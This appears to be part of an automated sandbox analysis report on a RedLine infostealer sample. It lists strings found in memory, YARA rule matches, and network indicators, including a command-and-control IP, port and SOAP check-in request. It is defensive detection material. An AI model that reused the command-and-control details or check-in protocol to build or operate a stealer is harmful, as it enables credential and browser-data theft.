                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.91
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.91:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003322000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.91:55615
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.91:55615/
                    Source: WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.91:55615t-sq
                    Source: tfF3UBTdr8.exe, WltfeVzR.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: tfF3UBTdr8.exe, WltfeVzR.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2208269456.000000000191E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.0/xmp
                    Source: tfF3UBTdr8.exe, WltfeVzR.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000035CB000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2095978320.0000000003111000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2195910209.0000000003074000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: WltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: tfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: tfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: tfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: tfF3UBTdr8.exe, WltfeVzR.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: tfF3UBTdr8.exe PID: 1492, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 0_2_076B44C80_2_076B44C8
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 0_2_076B44A70_2_076B44A7
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 0_2_076B51700_2_076B5170
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 0_2_076BCD400_2_076BCD40
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 0_2_076B4D380_2_076B4D38
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 0_2_076B49000_2_076B4900
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 0_2_076B68670_2_076B6867
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 0_2_076B68780_2_076B6878
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 0_2_076B48F10_2_076B48F1
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 9_2_017DE7B09_2_017DE7B0
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 9_2_017DDC909_2_017DDC90
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 9_2_06AD44689_2_06AD4468
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 9_2_06AD96309_2_06AD9630
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 9_2_06AD37209_2_06AD3720
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 9_2_06AD12109_2_06AD1210
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 9_2_06ADDA309_2_06ADDA30
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeCode function: 9_2_06ADD5289_2_06ADD528
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 11_2_076C44C811_2_076C44C8
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 11_2_076C44AD11_2_076C44AD
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 11_2_076C517011_2_076C5170
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 11_2_076CBF8811_2_076CBF88
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 11_2_076C4D3811_2_076C4D38
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 11_2_076C490011_2_076C4900
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 11_2_076C686711_2_076C6867
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 11_2_076C687811_2_076C6878
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 11_2_076C48F111_2_076C48F1
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 16_2_02B5E7B016_2_02B5E7B0
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 16_2_02B5DC9016_2_02B5DC90
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 16_2_0655962816_2_06559628
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 16_2_0655446816_2_06554468
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 16_2_0655121016_2_06551210
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 16_2_065532C816_2_065532C8
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 16_2_0655DD0016_2_0655DD00
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeCode function: 16_2_0655D10816_2_0655D108
                    Source: tfF3UBTdr8.exeStatic PE information: invalid certificate
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2101318526.0000000005C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2095978320.0000000003214000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004119000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2103451267.000000000A713000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBNiu.exe8 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000000.2004506954.0000000000D02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBNiu.exe8 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2091426104.000000000148E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2102270609.0000000007630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003322000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exeBinary or memory string: OriginalFilenameBNiu.exe8 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
